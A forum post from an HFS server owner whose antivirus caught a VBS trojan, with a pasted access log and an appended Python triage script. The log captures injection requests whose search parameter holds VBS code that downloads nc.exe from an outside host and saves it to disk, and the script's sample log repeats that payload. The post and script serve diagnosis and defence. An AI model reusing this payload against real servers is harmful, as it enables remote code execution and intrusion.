Hello all!
Today my antivirus told me that a trojan was deleted. It was a VBS script; I opened it in N++ and here it is on the screenshot.
After that I started trying to find out how it happened, and I found it. HFS is working on port 80, and every day I have a lot of messages of "requested GET" and "trying to upload xml". I opened HFS and saw it (look at the screenshot).
I've exported the full log to a txt file and here it is:
9:24:21 150.70.188.172:53306 Requested GET /
9:31:24 150.70.173.52:45675 Requested GET /
10:33:11 150.70.188.182:45937 Requested GET /
12:42:17 127.0.0.1:58565 Upload failed, Folder not found: getstring.xml
13:10:33 150.70.188.178:57561 Requested GET /
15:19:09 150.70.188.178:52023 Requested GET /
15:36:46 150.70.173.43:58891 Requested GET /
17:06:33 150.70.173.7:48701 Requested GET /
18:37:18 150.70.188.181:50506 Requested GET /
19:07:36 150.70.173.57:57074 Requested GET /
20:01:32 188.138.1.218:42693 Requested GET /
21:58:16 188.32.198.69:17087 Requested GET /
14:03:59 127.0.0.1:64139 Upload failed, Folder not found: getstring.xml
21:34:42 150.70.173.10:54565 Requested GET /
23:49:04 150.70.188.172:57408 Requested GET /
0:05:27 150.70.173.8:56183 Requested GET /
0:35:08 150.70.188.169:41555 Requested GET /
3:21:10 150.70.188.166:44530 Requested GET /
4:36:26 150.70.97.86:48072 Requested GET /
6:51:26 150.70.173.49:34699 Requested GET /
7:13:12 185.130.5.146:41838 Requested HEAD /
7:27:38 94.102.49.78:32822 Requested GET /
10:14:02 95.220.12.221:56833 Requested GET /
10:14:02 95.220.12.221:56841 Requested GET /
11:36:21 150.70.188.182:36670 Requested GET /
11:50:43 150.70.173.55:57792 Requested GET /
12:54:18 150.70.188.179:46689 Requested GET /
13:59:29 150.70.173.44:58075 Requested GET /
14:04:32 127.0.0.1:61309 Upload failed, Folder not found: getstring.xml
23:53:11 150.70.188.180:38578 Requested GET /
2:39:02 162.13.170.123:60331 Requested GET /
14:05:32 127.0.0.1:58712 Upload failed, Folder not found: getstring.xml
14:14:29 193.124.183.62:59434 Requested GET /
18:38:16 150.70.188.165:52615 Requested GET /
0:53:07 150.70.188.180:38067 Requested GET /
3:02:21 150.70.173.41:58793 Requested GET /
4:21:49 37.153.173.10:57460 Requested GET /
5:25:08 185.129.62.62:55354 Requested GET /
5:45:42 185.65.135.227:54500 Requested GET /
6:58:03 171.25.193.131:22518 Requested GET /
9:45:22 150.70.173.5:41667 Requested GET /
11:56:00 193.124.183.62:50858 Requested GET /
12:24:58 185.130.5.146:47664 Requested HEAD /
14:06:30 127.0.0.1:51959 Upload failed, Folder not found: getstring.xml
16:53:28 163.172.13.21:63567 Requested GET /
17:53:59 66.240.192.138:51136 Requested GET /
18:17:14 150.70.188.171:37191 Requested GET /
21:19:42 159.224.52.241:57673 Requested GET /
22:04:44 150.70.173.40:58734 Requested GET /
23:13:02 193.124.183.62:62283 Requested GET /
0:27:39 162.13.170.123:56872 Requested GET /
4:04:43 188.32.105.181:65077 Requested GET /
4:09:21 150.70.173.58:34591 Requested GET /
5:16:26 77.247.181.162:46931 Requested GET /
7:49:13 51.254.44.137:41738 Requested GET /
9:49:22 150.70.188.178:55827 Requested GET /
10:38:10 193.124.183.62:61670 Requested GET /
14:07:31 127.0.0.1:54231 Upload failed, Folder not found: getstring.xml
15:42:55 185.130.5.146:39691 Requested HEAD /
17:24:32 137.226.113.7:44838 Requested GET /
19:15:21 193.124.183.62:55358 Requested GET /
1:46:28 188.138.1.218:59867 Requested GET /
3:10:43 62.210.162.182:41469 Requested GET /
3:10:45 62.210.162.182:48773 Requested GET /
4:50:19 176.10.99.206:60831 Requested GET /
5:05:30 112.115.19.84:60662 Requested GET /
5:06:00 112.115.19.84:60676 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
> .type = 1 '//binary
> .open
> .write xHttp.responseBody
> .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:06:03 112.115.19.84:60677 Requested GET /?search=5:06:04 112.115.19.84:60678 Requested GET /?search=5:06:10 112.115.19.84:60679 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
> .type = 1 '//binary
> .open
> .write xHttp.responseBody
> .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:06:13 112.115.19.84:60680 Requested GET /?search=5:06:14 112.115.19.84:60681 Requested GET /?search=5:17:19 112.115.19.84:60818 Requested GET /
5:17:46 112.115.19.84:60839 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
> .type = 1 '//binary
> .open
> .write xHttp.responseBody
> .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:17:49 112.115.19.84:60840 Requested GET /?search=5:17:49 112.115.19.84:60841 Requested GET /?search=5:17:58 112.115.19.84:60842 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
> .type = 1 '//binary
> .open
> .write xHttp.responseBody
> .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:18:00 112.115.19.84:60843 Requested GET /?search=5:18:01 112.115.19.84:60844 Requested GET /?search=5:32:09 150.70.188.181:42913 Requested GET /
5:58:29 150.70.188.181:42625 Requested GET /
So, what should I do to prevent the same situation? Now I have switched off HFS+, but I really need it. Let me know how to prevent illegal actions. Thanks!
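As an added example (not part of the original post, and not HFS code): a small Python triage script for an exported HFS log in the format shown above. It parses the "time ip:port message" lines, re-attaches the ">" continuation lines of a multi-line search parameter, splits entries that were run together on one line, and flags search requests carrying VBS or HFS-macro tokens as well as uploads attempted from the server host itself (127.0.0.1). The sample log is constructed with documentation IP addresses, not the real ones from the post.

```python
import re
from collections import Counter

# HFS log export format seen in the post: "H:MM:SS ip:port message".
ENTRY = re.compile(r"(?P<time>\d{1,2}:\d{2}:\d{2}) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) (?P<msg>.*)")
# Some exported lines carry several entries back to back; split ahead of each "time ip:port ".
SPLIT_AHEAD = re.compile(r"(?=\d{1,2}:\d{2}:\d{2} \d{1,3}(?:\.\d{1,3}){3}:\d+ )")
# Tokens that have no business in a search box: VBS download-and-save calls and HFS macro syntax.
SCRIPT_MARKERS = ("createobject", "adodb.stream", "savetofile", "responsebody", "xhttp", "{.", ".}", "|cmd")

# Constructed sample (TEST-NET addresses), mimicking the post's log layout.
SAMPLE_LOG = """\
9:24:21 192.0.2.10:53306 Requested GET /
12:42:17 127.0.0.1:58565 Upload failed, Folder not found: getstring.xml
5:06:00 198.51.100.7:60676 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://203.0.113.5/nc.exe", False
> .savetofile "C:\\Users\\Public\\nc.exe", 2 '//overwrite
> end with.}
5:06:03 198.51.100.7:60677 Requested GET /?search=5:06:04 198.51.100.7:60678 Requested GET /?search=
5:17:19 198.51.100.7:60818 Requested GET /
"""

def parse_hfs_log(text):
    """Return a list of {time, ip, port, msg}; '>' lines are appended to the
    previous entry (multi-line request parameter) and fused lines are split."""
    entries = []
    for raw in text.splitlines():
        if raw.startswith(">") and entries:
            entries[-1]["msg"] += "\n" + raw
            continue
        for piece in filter(None, SPLIT_AHEAD.split(raw)):
            m = ENTRY.fullmatch(piece.strip())
            if m:
                entries.append(m.groupdict())
    return entries

def classify(entry):
    """Return a reason string if the entry looks hostile, else None."""
    msg = entry["msg"].lower()
    if "?search=" in msg and any(tok in msg for tok in SCRIPT_MARKERS):
        return "script/macro payload in search parameter"
    if entry["ip"] == "127.0.0.1" and msg.startswith("upload failed"):
        return "upload attempt from the server host itself"
    return None

def triage(text):
    """Map each reason to a Counter of source IPs, for a quick who-did-what view."""
    report = {}
    for e in parse_hfs_log(text):
        reason = classify(e)
        if reason:
            report.setdefault(reason, Counter())[e["ip"]] += 1
    return report
```

Run it over the real export with triage(open("hfs.log").read()) to see which sources sent search requests containing script, and whether the 127.0.0.1 upload attempts line up in time with them.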